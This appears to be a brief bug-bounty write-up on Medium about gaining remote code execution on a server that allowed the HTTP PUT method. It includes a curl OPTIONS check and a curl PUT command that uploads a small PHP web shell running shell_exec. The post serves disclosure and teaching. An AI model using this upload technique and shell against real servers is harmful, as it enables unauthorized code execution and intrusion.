Ebrahim Mustafa
1 min readJun 17, 2021

Rce via server misconfiguration Put Http method enabled

Hey guys today i want to speak about the first ‘Rce’ i found it at a privet program in “hackerone.com” with my best friend “Ahmed elmalkey”,

First we make subdomain-enumeration via many tools like ”subfinder with api keys ” now we had subdomains we went to check live subdomains after that

we sent the live subdomains to Nuceli after 5 min we Got a alert “http method enabled” “oh no is this real or false positive “ we said

we went to check was the alert is real or no

curl -X options https://target.ltd

GET,PUT,HEAD enabled hey this is real now we went to make POC

curl -X PUT https://target.tld/POC.php
-H “Content-Length: 69;Accept: */* “ -d “<?php
$output = shell_exec(‘ls -lart’);
echo “<pre>$output</pre>”;
?>”

now we got rce at server done.

thanks for read the essay and i’m sorry for any misspell because this my first writeup

Sign up to discover human stories that deepen your understanding of the world.

Free

Distraction-free reading. No ads.

Organize your knowledge with lists and highlights.

Tell your story. Find your audience.

Membership

Read member-only stories

Support writers you read most

Earn money for your writing

Listen to audio narrations

Read offline with the Medium app

Ebrahim Mustafa
Ebrahim Mustafa

Written by Ebrahim Mustafa

Cyber Security Pentester ,Bug hunter ,CTF player and Coder

Responses (3)

Write a response